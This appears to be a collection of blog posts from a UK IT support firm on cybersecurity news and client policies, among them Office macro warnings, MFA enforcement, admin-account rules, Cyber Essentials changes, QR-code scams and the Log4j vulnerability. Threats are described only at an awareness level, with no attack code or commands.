Instead of the old yellow ‘Security Warning’ labelled with an instant ‘Enable Content’ button users previously saw when using Microsoft Office applications, files will now prompt with a red ‘Learn More’ button, and users will be forced to see guidance on using macros securely, before being able to enable the content.

This small move – which was originally rolled out, rolled back, and then rolled out again – has been part of a slow clampdown on macros that has lasted more than two decades. Over the years macro functionality has steadily had more restrictions applied – in 2003 IT admins could require macros to have a trusted certificate (more like software applications) and as of 2013, could block macros by default.

But Microsoft hopes this simple firebreak will nudge us to think twice, and stop (potentially millions) of people from endangering themselves and their technology with a click.

Human nature continues to catch out many users curious about mystery documents – particularly since only a small fraction of Microsoft Office users are even aware of Microsoft 365’s powerful automation features.

For IT support and expertise, please contact our team today.

A Policy Change: Admin Rights

This year we’ve made a number of policy changes to how Lineal protects your technology, data and users – part of a programme of adjustments designed to help our clients keep their organisations secure.

One of these is a change to how we manage security permissions. In future, we’ll be stricter about how and when we allow administrator (‘admin’) privileges to be used.

What does this mean?

Put simply, we expect no end-user to use an administrator account for their routine work.

Where a user needs administration privileges as part of their official role, we expect a separate admin account to be created for this function, with some extra protections put in place.

All admin accounts should be named to indicate the owner, assigned to only one individual, authorised by management, and protected by Multi-Factor Authentication, where available.

Why are Lineal taking this step?

Admin accounts carry enhanced powers – often to install applications, access raw data or bypass safeguards – each of which represents a more significant cyber security threat where an admin account is misused or compromised.

In the event of a cyber security breach, it’s not uncommon for attackers to leverage admin accounts to attack other systems or users laterally, using heightened account privileges.

Reducing the number of administrator accounts, their use, and the risk of an account breach, all help to maintain strong cyber security within your organisation.

We’re also acting in line with the current requirements of the UK NCSC’s Cyber Essentials Scheme, as well as ISO 27001, CIS benchmarks and NIST 800-60.

Does my organisation need to budget for this?

No – this change will be a guiding principle for the assignment of existing/new admin privileges.

My organisation is subject to a compliance standard / framework, what do I do?

If you’re already subject to any specific controls over the distribution of administrator privileges, please contact us to discuss further, and we’ll do our best to explain how these changes support or enhance your existing controls.

What if I don’t want to do this, because of _________?

Where a client still allows a user to have local or domain administrative rights for standard duties, we’ll now require you to declare this to us in writing – as part of a disclaimer accepting liability for any adverse consequences of this decision.

We’ll also make clear that any remedial works required by us following an incident caused by this decision will be chargeable.

Who can I speak to about this?

Please contact our IT Support Teams via our Client Portal, via [email protected] or, 01271 375999, and one of our team will be happy to assist.

Apple have unveiled a special ‘Lockdown Mode’ for individuals likely to face extremely targeted threats to their cybersecurity.

Lockdown Mode will be added to iOS 16, iPad OS16 and macOS Ventura, and is designed for a small number of users who are likely to be targets of high-end surveillance spyware, and require the digital attack ‘surface’ of their device to be drastically reduced.

The new functionality is partly a response to the work of organisations like NSO Group, who have faced repeated accusations that their counter-terrorism surveillance software has also been used by governments and various state-sponsored actors around the world to illegally target journalists, activists and other political opponents.

The new tool represents an extreme device-hardening posture, and imposes very strict controls – including:

* Messages: Most message attachment types other than images are blocked. Some features, like link previews, are disabled.

* Web browsing: Certain complex web technologies, like just-in-time (JIT) JavaScript compilation, are disabled unless the user excludes a trusted site from Lockdown Mode.

* Apple services: Incoming invitations and service requests, including FaceTime calls, are blocked if the user has not previously sent the initiator a call or request.

* Wired connections with a computer or accessory are blocked when iPhone is locked.

* Configuration profiles cannot be installed, and the device cannot enroll into mobile device management (MDM), while Lockdown Mode is turned on.

Apple is keen to point out that “while the vast majority of users will never be the victims of high targeted cyberattacks”, lockdown mode will become an option for those that may be, and reasserts Apple’s credentials in the high-end ‘secure-phone’ market previously dominated by Blackberry and other niche hardware players.

The tech giant’s will also offer up to $2m to anybody able to demonstrate a vulnerability in Lockdown Mode under their bug bounty programme – the largest such reward available in the industry.

Just occasionally cybercriminals discover a new technique for tricking users or gaining access to something they shouldn’t have.

Hacks and scams go in and out fashion like much else – depending on their effectiveness and particularly, awareness among the wider public.

It’s helpful to keep one step ahead, so here’s our pick of some newer emerging threats to watch out for:

MFA Fatigue

The introduction of Multi-factor ‘Prompt’ notifications on Android and iOS are meant to make life easier. Instead of typing in a six digit code sent by text or generated by an authentication app, the user simply clicks ‘Yes this is me’ (or similar) when prompted on their authorising device.

But a hacker who obtains your password may have the option to spam the user with such notifications, until the user either accepts one by mistake or deliberately to make the prompts go away.

This trick can even get the hacker past otherwise bulletproof MFA on an account by pestering a targeted user – and users are often spammed in the early hours, when they’re likely to approve the login attempt without thinking, believing it to be a technical fault. By the time they’re asleep again, the hacker has remotely accessed their account.

30 Pieces of Silver

One of the most interesting revelations from recent arrest of members of the Lapsus$ ransomware group was wider publicity of their public-facing telegram channel.

Among the techniques used by the prolific hacking group were appeals to recruit disaffected employees of notable companies.

This presents an interesting strategic question: how do you defend against a disgruntled member of your team being bribed to hand over vulnerabilities, credentials or privileged access that would otherwise remain guarded? Attackers who begin inside a networks usual defences have an extra capability for ‘lateral’ attacks that use each system or login captured to slowly compromise more of an organisation.

An ‘Insider’ attack is perhaps a corporation’s worst nightmare – with even a single VPN or admin password able to cause severe damage.

Dodgy App Permissions

A massive ecosystem of additional connected apps is available for Microsoft 365 – although many require addition permissions (such as access to emails, calendars, contacts and more) which are approved through an authorisation standard called Oauth.

Unfortunately this is open to abuse, particularly ultra-targeted spear phishing of upper-level management and those with privileged accounts. First step: get the user to visit a URL that wants permission for an innocent-sounding app to connect with Microsoft 365. Second step: when the user ‘Accepts’ an app’s access conditions, they grant an access to much of their Microsoft 365 account – an access that works remotely without being re-authorised by MFA or any of the usual protections, often in perpetuity.

In some cases the permission windows for the suspicious app are specially modified so that cancelling is circular, or give the app immediate permission to email other users the same app authorisation to spread the hack further.

QR Codes

We’ve written before about the problem with QR codes – and many of the ways they’re potentially open to abuse.

In a mobile-first world, QR codes in public places can all too easily be tampered with to make users pay the wrong website, share malicious links on social media, or even dial premium numbers. Although Google Lens and similar apps will preview a link before the user clicks it, the underlying flaw is how easy it is to mimic the style and placement of official, legitimate QR codes, without the end user realising the swap has taken place.

The central problem is user awareness – would you click on a blind link in an email? No, exactly.

For cybersecurity expertise and support, please contact our team today.

If your staff’s company-issued devices are now everywhere, how can you keep track – and what are the benefits?

Device Management technology has really come into its own in the last few years, particularly as companies have embraced hybrid working during Covid. 

Maintaining a large digital estate of company devices far beyond the reach of your travel distance or office network sounds like a logistical headache – but it simply requires a shift in approach. Here’s why your organisation should consider rolling out device management:

The Basics

First and foremost, device management means protecting access to data and your hardware investment.

Tracking a device’s specifications and physical location remotely have long been a cornerstone of device management – but modern hardware-loss protections go a step further by adding the ability for IT admins to remotely lock or even wipe a device in the event of a suspected theft. On the best solutions, MDM software can also look out for suspicious warning signs like a mobile device being jailbroken – and conditionally deny access to company apps or data.

In 2022 that safeguarding can now apply across desktop, mobile and tablet devices – right across Windows, Mac, iOS, Android & ChromeOS. Now that staff work anywhere from their homes to airports, that lockdown ability is a powerful tool.

Stress-Free Maintenance

With modern device management it’s easier for your IT administrators to manage devices, apps and the updates that apply to them.

In the old days (well, the early 2000s), remote administration meant a device had to be domain controlled, connected via VPN or similar, or within physical travelling distance of the technician.

No longer. Modern device management means device profiles, Windows updates, access to company-approved apps, patches, firewall rules and more can all be created and pushed out centrally via content-distribution ‘over the air’. Device management means even the hardware specifications of company devices can be remotely managed, potentially saving thousands of hours of IT support hours.

The ‘Out-of-the-Box’ Experience

Don’t forget the users! Device Management isn’t just to make life easier for the IT admins, but also helps make sure the end-user gets a great experience.

With remote device onboarding, the preparation of new or re-issued devices can be done in advance, allowing the user a complete profile of settings and apps to launch right ‘out of the box’. That flexibility allows organisations to enroll staff that never visit a central hub to collect the device, supporting distributed organisations with personnel (potentially) all over the world.

If your MDM solution also supports single-sign-on, that sign in can be the user’s passport to the full ecosystem of company apps and IT resources, right from day 1.

For IT support and systems expertise, please contact our team today.

Three major tech providers have agreed to introduce support for passkey-based login, in line with recommendations of the FIDO Alliance.

Passkeys have been proposed as one of the possible futures for the death of passwords, and would be freshly generated with each biometric login to a registered device to help prevent password-theft.

In future Google Chrome, Microsoft Edge and Apple’s Safari will all facilitate passwordless login as an option – and major tech providers will offer passkey login for important online services including Active Directory and Azure.

• Apple: “An Expansion of Passwordless Standard Support“
• Google: “One Step Closer to a Passwordless Future”
• Microsoft: “Expansion of FIDO standard and new updates for Microsoft passwordless solutions”

Microsoft estimate that around 330,000 people have removed their password from their Microsoft Account in the last six months – with most using Microsoft Authenticator as a kind of passkey instead.

‘Hackers don’t break in, they log in’ is an often repeated mantra among cybersecurity professionals – reflecting the fact that most online accounts are breached via a normal login attempt, but with stolen credentials.

The FIDO alliance is the the online movement to replace password authentication entirely with single-use passkeys – although the organisation admits there are barriers to entry, including organisations’ cost to develop their own versions of the technology, an unfamiliar user experience, and the reluctance to ‘go first’.

It is hoped that with major tech providers building passkey support into their browsers, many more developers will be able to adopt the new standard to help keep users secure.

For Cybersecurity expertise and support, please contact our team today.

A good cybersecurity strategy includes layers of defensive counter-measures, designed to mitigate a wide range of threats at different levels of your organisation.

However there’s lots of ways you can help bolster your cybersecurity a little more, even working on a budget of (basically) zero – here’s our pick of the best:

2FA / MFA Directory

We’ve written before about the colossal effectiveness of turning on multi-factor authentication for all your online logins – in particular the way it helps prevent an outside attacker accessing your technology remotely with stolen credentials.

Although compulsory for online banking in the UK, this feature is often available for free elsewhere online as well – and you should take full advantage.

This useful website is an index of websites and online services that already offer 2FA on your account(s), which methods are available, and where to find them.

Customised Login Pages

By default, your login window for many public cloud services is identical to everyone else’s – for example, by default Microsoft 365 companies see a picture of Rio de Janeiro each time they sign in. However, many people don’t realise this image can be customised, making the sign-in experience unique for your compny.

This feature is often free – but has one really important cybersecurity benefit: it helps your users realise when they might have been redirected to a phishing website. Fake login pages attempting to steal their credentials will often use the default background image to be recognisable to more people, rather than your custom one. When one of your staff clicks the wrong link, the wrong background might just help alert them before they hand over their credentials to a cybercriminal.

‘Spot the Phish’ Quiz

Let’s be honest, many online cybersecurity training tools are a bit rubbish – but this little gem of an online game from email security provider Barracuda uses five real examples of scam emails (A & B) to quiz your staff, and educate them on the warning signs.

User training helps build a resilience to cybersecurity threats that isn’t available via technology – protection for the ‘human layer’ of the organisation that needs to be vigilant, no matter which technology they’re using. Challenge your team today!

Has your Email been Pwned?

This delightfully terrifying website allows you to search those massive cybersecurity breaches you read about in the news for your own email address – informing you whether your information was involved, and where.

If you find an old email address has been listed in a known data breach, it’s best to update your password, turn-on two-factor authentication, and make sure your haven’t used that password anywhere else online – because it’s entirely possible that your credentials are already circulating as part of large stolen data dumps on the dark web.

Build a Cyber Action Plan

The UK National Cyber Security Centre (part of GCHQ offers a free ‘Cyber Action Plan’ tool to sole traders and smaller businesses that takes you through a short questionnaire about your business to help you build a starter list of recommendations to consider.

This is a similar exercise to that undertaken by professional managed cybersecurity providers – but on a smaller scale – well worth a look!

For cybersecurity expertise and support, please contact our team today.

It’s been almost a year since Lineal introduced our new Client Portal, which allows our customers to not only raise new IT Support tickets direct into our systems, but review ticket progress and respond as new information is discovered.

However, we can also use global ticket data to get extra insight into our IT support process, improve our services, and help customers enjoy a better experience. So what have we learned so far?

Faster Responses

We’ve noticed some real advantages to customers connecting with us via the client portal – since last year, our average first-response time has improved by approximately 8%.

Evidence also suggests that in-life ticket responses are actually quicker via the portal than when raised by phone (around 5% on average), reflecting the fact that tickets can be updated without both agent and customer being available to continue the conversation at exactly the same moment.

So what does the time saving look like? In practical terms, it takes around 4 minutes longer for a simple phone call to be received, spoken and generated into a new ticket, rather than for that ticket to be submitted directly to the portal by the customer.

If most of those calls became portal tickets, Lineal customers and staff would save as much as 300 hours of talk time each and every year.

Changing Times

In previous years we’ve noted that Monday is our busiest day of the week, however recent data suggest this has shifted to Tuesday – possibly reflecting new hybrid working trends catching on, as office workers choose to reacclimatise to work from home either side of a weekend.

9am-10am remains overwhelmingly our busiest time of the day – as well as the period when a portal ticket can be created with the biggest time saving, compared with calling our Helpdesk.

High Importance

We took a gamble giving customers the ability to grade the priority of support tickets via the portal – we weren’t sure whether this tool would be used the way it was intended.

Statistics suggest it’s been an overwhelmingly positive feature – our highest priority tickets raised via the Client Portal (rated High and Urgent) have significantly faster first response times than not just tickets on average, but corresponding priority tickets raised by other methods.

Positive Feedback

Instant feedback (‘smiley face’) buttons added to the bottom of each ticket help users tell us more broadly how we’ve been doing. Ticket feedback for our IT Support service has been overwhelmingly positive (95%) and less than (5%) negative.

This is important because the feedback is gathered at time of writing, and on a rolling basis – rather than at times we’ve chosen to measure. Our current target is to increase this to 98% positive or greater.

For IT Support help and expertise, please contact our team today.

Members of Lineal’s cybersecurity team recently ran a special training event for over a hundred UK exporters, as part of the Department for International Trade’s ‘Export Academy’ initiative.

The UK Export Academy was formed to give UK companies vital know-how as they develop international trade opportunities, and to help them avoid common pitfalls.

Attendees were given a wide-ranging crash course on common threats, including a run-down of various vectors of cyber attack typical to companies trading internationally, and techniques to mitigate dangers.

Topics included best practice for password management & identity protection, email safety, device health, network safeguards and much much more.

We’ll be part of other UK Export Academy events in the near future – you can find more information about the academy here.

Learn more about Lineal Cybersecurity expertise here.

Microsoft have announced a raft of new security features for Windows 11 – aimed squarely at the new trend of hybrid working.

With millions of users working remotely post-Covid, the enhancements largely focus on hardware security and identity protection, as end-user devices access ever more cloud-resources from a broader range of working environments.

Microsoft Pluton

‘Microsoft Pluton’ is the name of a new security processor integrated into CPUs on devices shipping with the new operating system – an App Control feature designed to prevent untrusted apps from running, block the theft of user credentials, and counter dangers from outdated drivers.

As we’ve noted before, Pluton (like Windows 11 itself) also relies upon Trusted Platform Module (TPM) technology to fire up a PC securely – but some TPM chips remain vulnerable to encryption keys being intercepted between components. Pluton devices are expected to close off that weakness, preventing this kind of hardware attack.

Smart App Control

As many predicted, Application Management begins taking centre-stage in 2022, as bigger organisations seek to prevent users introducing rogue software into their IT infrastructure (or worse, introducing it back into the company network themselves.)

Smart App Control blocks unsigned or suspicious apps at the OS level, and will receive regular updates daily.

However – it’s worth noting this core feature only applies to newly shipped devices – so even those who adopted Windows 11 early would have to complete a full operating system reinstall to ensure Smart App is live.

Microsoft Defender SmartScreen

SmartScreen helps protect identity by alerting the user if they’ve begun interacting with a known malicious application, fake or hacked website – with the added advantage that the safeguard is pre-installed for all users.

Microsoft are keen to demonstrate SmartScreen’s record of success elsewhere – blocking nearly 26 billion brute force attacks on Microsoft Azure Active Directory, and nearly 36 billion phishing emails that were intercepted by Microsoft 365, last year alone.

Credential Guard

Another ‘by default’ upgrade – Credential Guard isolates really important system secrets in a way that is designed to stop ‘pass the hash’ style attacks where a hacker is able to use the encrypted version of a password to gain entry, and (Microsoft claim) can even prevent malicious applications that have somehow obtained Admin-user privileges on their device from accessing those secrets.

You can discover the full list of the security enhancements coming to Windows 11 here.

The National Cyber Security Centre (NCSC) has released its annual ‘Cyber Security Breaches Survey’.

The survey is used to inform government policy on digital security, educate British businesses, and ensure UK cyber space remains safe.

Data collected across over 2,400 business and 850 charities produced some startling statistics concerning the ever-looming threat of cyber-attacks infiltrating UK businesses’ digital footprint.

The report discovered that 39% of UK businesses detected an incoming cyber-attack during 2021. Phishing attacks made up a fifth of all threats identified – the most frequent type of malicious attack.

Organisations also revealed that ransomware was being recognised as a serious digital threat with 56% of businesses stating they have installed or will be introducing a company policy to not pay ransoms to cyber criminals.

Whilst 58% of small and medium businesses disclosed to outsourcing their IT Support service, only 23% of surveyed businesses had a cybersecurity incident management strategy in place that is more advanced than a basic endpoint antivirus.

NCSC promote a blend of regular cyber security learning and training processes within your business to better inform the deployment of traditional cybersecurity software measures across all the organisation’s IT systems.

This multi-layered approach aims to counteract the report’s discovery that a lack of cyber technical expertise amongst UK businesses is to blame for threats going undetected.

Similarly, a company-wide policy of digital hygiene erodes the false assumption that managed cybersecurity strategies are a cost to the business rather than a strategic, protective investment.

31% of business admitted being attacked at least once a week showing that any weak link in an organisation’s cyber defence can have grievous financial implications.

To mitigate this, we recommend organisations follow the NCSC’s guidance and adopt Cyber Essentials and Cyber Essentials +. The scheme requires businesses to meet or exceed an assured set of security requirements each year to protect against common forms of online crime, technology dangers and digital threats.

It is estimated that a Cyber Essentials certification can reduce your organisation’s risk of a cyberattack by 98.5% – contact Lineal to assist with your organisation’s application and to help you meet the requirements for a successful certification or re-certification today.

Endpoint security specialist SentinelOne have isolated and demonstrated an installed instance of HermeticWiper malware currently destroying PCs across Ukraine.

First spotted on February 23rd, the 114kb ‘Hermetic Wiper’ malware gets its name from the (likely fictitious) ‘Hermetic Digital Ltd’ – a Cypriot company allegedly named on its digital certificate. The malware appears to have been circulated among a number of Ukrainian organisations, and abuses a partition management driver to begin corrupting a device’s physical drives.

Watch below as SentinelOne test-detonate an instance of Hermetic Wiper, first on an undefended PC, then with powerful endpoint protections in place:

Video Credit: SentinelOne.

Once activated, the malware initiates a device shutdown, making the system irretrievable and booting only as far as Windows’ ‘Your PC/Device needs to be repaired’ screen.

The timing and nature of the attack (crippling PCs in the short term, until they can be replaced) suggests an effort that has been coordinated with Russian military operations.

For cybersecurity advice and expertise, please contact Lineal today.

QR codes have become an easy way for companies to promote themselves – now that everyone carries a barcode scanner in their pocket (their smartphone) why not take advantage of this to better connect with customers?

Well…. because it can also be a cybersecurity nightmare.

Cryptocurrency platform Coinbase recently made headlines by using their Super Bowl half-time advert to advertise themselves with a bouncing QR code that users could scan live from their sofas. As many pointed out, this is literally the equivalent of clicking a blind link in an email from an unknown sender – with users unlikely to have checked where the link will take them, or what information they’re handing over when they get there.

Worse still, even if a company’s own QR codes are harmless, it’s very easy to generate imitations online that are not – leveraging a larger company’s advertising as a way to scam users.

QR codes can all too easily be planted by third-parties as a way of tricking the unsuspecting – in particular, you need to be wary of the following scams:

Parking Meters
– A fake parking meter QR code, stuck as a label, acts in a similar fashion to phishing emails and the carding-devices cybercriminals have famously used on ATMs to steal card details. By re-directing the user to a fake payment portal to pay their parking, this catches those who might otherwise be a rush. See also: fake parking penalty tickets.

SMS/Phone Codes
– QR codes are generally used from smartphones with calling and SMS sending abilities, so it’s possible to prompt the user to send a text message to a number. Handy for business, certainly, but risky if the user doesn’t realise they’re calling or texting a premium number.

Social Media Share
– Scan here to automatically tweet a link from @Lineal! Unfortunately that link is easily manipulated, causing the scanner to potentially become part of further phishing attempts on their own twitter followers.

Connecting to Wi-Fi
– In public spaces, many businesses will prompt users to join their free Wi-Fi via QR code. Clever and convenient, but obviously easy to use as a mechanism for a man-in-the-middle attack by those whose fake Wi-Fi network is simply a trap set for the unsuspecting user who’s just trying to access their email in a coffee shop, airport or hotel.

Guidance:

Think before you click – does the QR code match the rest of their branding? Where does the link preview point to? Is there anybody/anywhere you can double-check?

Use a Password Manager – although you might not spot a fake website URL, a password manager that normally autofills only a password on specific sites will recognise the fake immediately.

Assuming the device doesn’t sit within the container of a firewall that’s likely to detect threats as you browse the web, companies issuing work mobiles & tablets need to also extend endpoint security software to those devices – the same way you might a work laptop for those working on the move.

Most importantly, users need to be regularly educated on the importance of recognising phishing scams with organised training – to build personal resilience that extends to whatever device they happen to be using.

For Cybersecurity expertise and support, contact Lineal today.

This year GCHQ’s National Cyber Security Centre have introduced stricter new rules for businesses and organisations hoping to achieve UK Cyber Essentials (CE) and Cyber Essentials Plus (CE+) Certification.

In addition to promoting the scheme’s key priorities, the new terms for successful assessment are widely believed to be partially a response to recent events – including more widespread remote and home-working via cloud-based web services during Covid-19, and a series of devastating ransomware attacks that disrupted major infrastructure in the US.

Need a taster of what’s to come? Here are our key take-aways:

Cloud Services under the spotlight

In previous years organisations could exclude many cloud-based platforms from the scope of their assessment – but with the wholesale move to the cloud only accelerating under working from home, and web-services containing ever more data, cloud-based systems such as Microsoft 365 and Google Workspace move squarely into the frame.

Multiplying multi-factor

Most critically this year, two-factor authentication will become compulsory for all administrator accounts registered to cloud-based services – as the NCSC tries to stop hackers obtaining credentials and then remote accessing their way to cyber-devastation. Expect user accounts to follow in 2023 – an exemption may be granted under certain circumstances, but it’s clear the days of the old ‘password-only’ login are numbered.

2022 also places new restrictions on passwords: organisations are encouraged to have password managers enforcing random 8-characters or more, or a 12-character pattern, at a minimum. Mobile devices and similar should have minimum 6-figure pin or biometric security – with a recommended lock-out for ten failed password attempts.

Sub-networks under scrutiny

Sub-networks may now only be excluded if they don’t have a connection to main networks or no internet-access – meaning many organisations will now have to detail their satellite and subordinate operations more fully.

Patching-discipline is said to be the most common reason for failing a Cyber Essentials assessment – the 14 day patch window remains, but automated updates should now be enabled if available. Thin client devices are to be included from next year, and unsupported software should be air-gapped on sub-networks that don’t have internet access.

A question of hats

All super-users are now meant to have distinct user and administrator accounts, with stronger security on the latter. This distinction extends to cloud-services, meaning administrators will have to swap between their day-to-day functions completed on user accounts, and their admin roles where they have elevated privileges.

In the wake of the Colonial Pipeline ransomware attack and others, it’s clear rules for admin accounts will only become more stringent.

Greater auditing

Cyber Essentials Plus Certification will increasingly require more in-depth auditing by independent inspectors – including sending malicious test-emails, validating software versions, testing file access, and confirmation of the all-important admin/MFA rules described above.

Lineal are a Cyber Essentials Plus certified organisation, and can help your team achieve certification. Contact our team today.

For 2022 we’re announcing a series of changes to the way Lineal helps keep your IT safe and secure – including some new technologies that will allow us to better care for our customers’ cybersecurity.

One of these is the introduction of SentinelOne as an alternative to traditional antivirus options. We’ve formed this partnership to offer a more extensive set of tools to customers, and further modernise the way we keep your staff, systems and data safe.

You can learn more about SentinelOne, and why we’ve taken this step, below:

What is SentinelOne?

SentinelOne is a next-generation Endpoint Detection & Response (EDR) software that we’ll be recommending in future to protect PCs/Macs and more from cybersecurity threats, in place of more traditional antivirus options.

Why are Lineal making this change?

We’re responding to changing times – in recent years we’ve seen the threats to small businesses shift away from general malware towards more dangerous ransomware that encrypt data and seek to extort payment from victims.

Why have you re-focused on Ransomware?

The scale of the threat. While malware might endanger data, hit device performance or introduce other serious technical problems, ransomware can be totally devastating – bringing even major industries to a standstill.

The UK National Cyber Security Centre recently argued that “Ransomware represents the key cybersecurity threat facing Britain…” – following a series of high-profile and crushing ransomware breaches in the US, across industry, and against the NHS.

For a small business, a ransomware infection is potentially terminal, and as the methods used by cybercriminals change, our recommended cybersecurity precautions need to adjust to reflect this.

What’s wrong with traditional antivirus?

While a traditional antivirus software is a good defence, these typically work by comparing against a list of known threats that are regularly updated. This technique has its limits – particularly when it comes to never-before-seen ‘Zero Day’ threats.

With the spread of ‘ransomware kits’ on the dark web, it’s becoming easier and easier for cybercriminals to introduce brand new variants and strains, on an hourly basis. This necessitates a different kind of counter-measure: intelligent EDR software that understands how a threat to an endpoint ‘acts’ and can remediate more effectively.

OK, but why SentinelOne rather than [Product X?]

In addition to performing exceptionally well in independent testing, we’ve been impressed with SentinelOne’s cloud-based management and ‘storyline’ investigation tools, and their Ransomware Warranty pledge of $1,000 per computer (Up to $1m) for each machine with valid protection.

Even more impressively, the Singularity engine utilises some highly advanced fingerprinting technology to support cutting-edge rollback abilities – a powerful aid to incident response.

The company consistently ranks as a Leader in Gartner analysis, is the only vendor on record to achieve a 100% score in MitreEngenuity testing, and won both Gartner’s 2021 ‘Customer Choice’ highest ranked product, and CRN’s 2021 Product of the Year award for endpoint security.

What does this all mean for me?

In future cybersecurity discussions, one of the Lineal team may speak with you about EDR, and may quote SentinelOne as an alternative option to renewing your existing antivirus.

If you would like to discuss this with us, please contact [email protected] or simply speak to one of our team.

PC & Mac? And Servers too?

Yes!

Will I still be able to purchase other Antivirus products via Lineal?

Yes!

UK’s National Crime Agency (NCA) has urged the public to check the security of their email addresses and passwords after they uploaded 225 million unique passwords to hack-checking service Have I Been Pwned (HIBP).

With this addition of 225 million passwords obtained from cyber criminals, the NCA are urgently encouraging people to search for their own passwords on the website to check if their details are in the hands of hackers.

The 225 million passwords that were found in a compromised cloud storage facility were an accumulation of datasets both known and unknown.

HIBP is a free online service allowing users to search the now updated 853 million strong Pwned Password service database to see if their email or password has been compromised and in which specific historic or current data breaches their data was listed in.

Troy Hunt, owner of Have I Been Pwned, received a statement from the NCA reporting:

“During recent NCA operational activity, the NCCU’s Mitigation@Scale team were able to identify a huge amount of potentially compromised credentials (emails and associated passwords) in a compromised cloud storage facility”

Hunt further revealed that Have I Been Pwned’s new data ingestion pipeline is now live. The service allows law enforcement agencies across the globe to upload compromised email addresses and passwords directly to the Pwned database and has already seen collaboration with the FBI. Hunt goes on to explain:

“During the course of their investigations, they come across a lot of compromised passwords, and if they were able to continuously feed those into HIBP, all the other services out there using Pwned passwords would be able to better protect their customers from account takeover attacks”

Compromised passwords present significant security vulnerabilities for UK businesses as identified in a National Cyber Security Centre study which revealed that UK businesses experienced 777 cyber incidents in 2021, up from 723 in 2020.

Protection of network login credentials and identification of breached passwords is essential to ensure companies’ data remains secure and to avoid ransomware attacks as exemplified in July’s devastating ransomware attack on Kaseya and the 500 million affected by data breaches on Facebook and LinkedIn In April.

Being Cyber Essentials Plus Certified, Lineal has identified the growing need for a managed cybersecurity solution for businesses of all sizes. Our cybersecurity package aims to safeguard your business’ data against a host of cyber threats across multiple platforms including password encryption keys.

For more information of how we can help secure your business, visit our Cybersecurity page

A massive cybersecurity vulnerability discovered in an Apache logging tool has caused chaos across the internet, as organisations rush to patch millions of web-based services around the world.

The Log4j weakness exploits a bug in Apache’s open-source Log4j v.2 logging Java library, allowing an outside user to insert their own code that Log4j will interpret as ‘real’ instructions, to devastating effect.

Log4j is highly common across huge numbers of web-based services, servers with web based front-ends, and countless devices that support some kind of web-based maintenance – such as routers, network switches and many more.

A horrifying compilation of screenshots gathered on GitHub shows how (at time of writing) hackers can already exploit the bug everywhere from the search fields of Linkedin, Amazon and Baidu, to the login pages of Apple and Cloudflare, across Webex meetings and even the chat boxes on online games such as Minecraft.

In each case hackers can use the vulnerability to have the device’s network-access ability either forward confidential information to another URL, or retrieve a payload from another website. According to reports by ARSTechnica, the trick has already been used in the wild, with researchers seeing new botnets, crypto-mining malware and more installed by hackers.

CVE-2021-44228 is graded ‘Critical’ by Apache, and SysAdmins are advised to patch services urgently.

Lineal’s IT Support Teams are rolling out an important security change to the way we secure your Microsoft 365 accounts – enabling Multi-Factor Authentication (MFA) for all users.

We’re taking this step in response to a marked increase in account-theft attempts that we’ve seen in recent months; where previously MFA was an optional extra for added security, we’re now strongly recommending this be enabled across the board.

We feel this is an appropriate measure – in addition to having become a standard security measure across many web-based services in recent years, the advantages of MFA are increasingly recognised as vastly outweighing the downsides.

Who is affected by this change?

Every person with a Microsoft 365, Exchange Online or Azure user account licensed with Lineal.

What are the advantages?

An extra ‘factor’ at login drastically helps improve the security of your user account – making it difficult for any attacker who manages to obtain your username & password from logging into Microsoft 365 using your identity.

If your credentials are stolen from another website, or tricked from you via phishing email, this is no longer enough information for a hacker to be able to access your account from another location. Multi-factor authentication is estimated to stop over 99% of this kind of automated (harvested credential-stuffing) attacks.

Why are Lineal enforcing this?

We’ve encountered a noticeable increase in account-takeover attempts in recent months, with individuals’ work emails then being used for the onward spread of supply-chain attacks and phishing emails to others.

Multi-factor authentication is already standard practice across online-banking in the UK, and we believe it should be standardised for all identity-based online services.

How does it work?

In addition to your username and password, each user registers a third factor – typically either a mobile phone number (for SMS), smartphone authenticator app, USB security key or password manager – any of which generates a temporary code for login. This extra ‘factor’ verifies your identity – making it hard for a third party to log into your accounts, since they won’t have access to the temporary passcode.

There’s a short video introduction to MFA here, and you can learn more via our Client Portal guide here.

Which MFA method should I be using?

For preference, we recommend free Authenticator-app based MFA via Microsoft Authenticator, Google Authenticator or similar apps for iOS/Android. These are generally considered to be a more secure method than single-use SMS (text-message) codes, which have their weaknesses, with Microsoft and others announcing this method will be phased out.

However, even SMS-based MFA will be more secure than a standalone password, so we’ll still implement this where necessary.

Does my organisation need to budget for this?

No – although paid options are available if you need your MFA backed by Conditional Access or other security settings.

What’s the timetable for this change?

We’re aiming to have this change fully deployed by 2022.

What do I need to do?

Nothing for now – a member of your Lineal IT Support team will be in touch to discuss implementing the change.

What if I experience issues getting started with MFA?

Please contact our IT Support Teams via [email protected], 01271375999 or via our Client Portal, and one of our team will be happy to assist.

Apple has unveiled ‘Self Service Repair’ (SSP) giving hope to individual consumers to complete their own repairs with genuine Apple parts and tools.

With the introduction of ‘Self Service Repair’, individual customers will now join 2,800 Independent Repair Providers (IRPs) and 5,000 Apple Authorized Service Providers (AASPs) in receiving authorisation to fix their Apple devices using genuine parts, tools and documentation guides.

The move comes after growing pressure on tech providers to support a public ‘Right to Repair’ in the interests of environmental and consumer protection.

Over 200 Apple OEM parts and tools along with manual documentation will be made available for the iPhone battery, display and camera functions initially with additional repair opportunities being added during 2022. SSP will see first light in the United States with global expansion planned throughout 2022 facilitated via an online store for technical consumers with the knowledge and experience to fixing their own damaged devices.

Prices for these genuine parts are yet to be officially released, but the online store will be managed by an unnamed third party provider with repair manuals being made available through the Apple Support website.

This announcement now positions Apple as the central hub for consumers who desire to access genuine parts and how to manuals for out of warranty, damaged devices. However, the scheme is only aimed at new and future models of Apple products and will not help customers who own older generations of iPhones or Mac devices. SSP is initially being rolled out across the iPhone 12 and 13 line-ups with future plans to include Mac computers with M1 Chips.

Responsibility for fixing their own Apple devices has been shifted onto the consumer from IRPs permitting wide public access to the tightly guarded Apple ecosystem. Examples of the devolution of repairs to the masses include new software availability for ‘True Tone’ allowing for replacement display parts to be used on iPhone devices and customers who return their broken Apple ‘core’ device parts will receive credit towards their original purchase order.

The self-service repair program is just one pillar of a multi-pronged approach by Apple for increasing the longevity of their endpoints’ lifecycles including the introduction of a ceramic chassis shield and the replacement of plastic with steel on the iPhone 12 and 13 alongside crack resistant crystal for the Apple Watch 7’s display.

However, Apple and associated commentators warn of the dangers of consumer self service repair where DIY by Apple device owners can lead to further damage of the device through misrepair where tampering of the lithium-ion battery can cause serious bodily harm.

For the majority of Apple device owners, visiting a professional repair provider such as Lineal with our experienced technicians who use genuine Apple parts is the most reliable and safest way to ensure a successful repair:

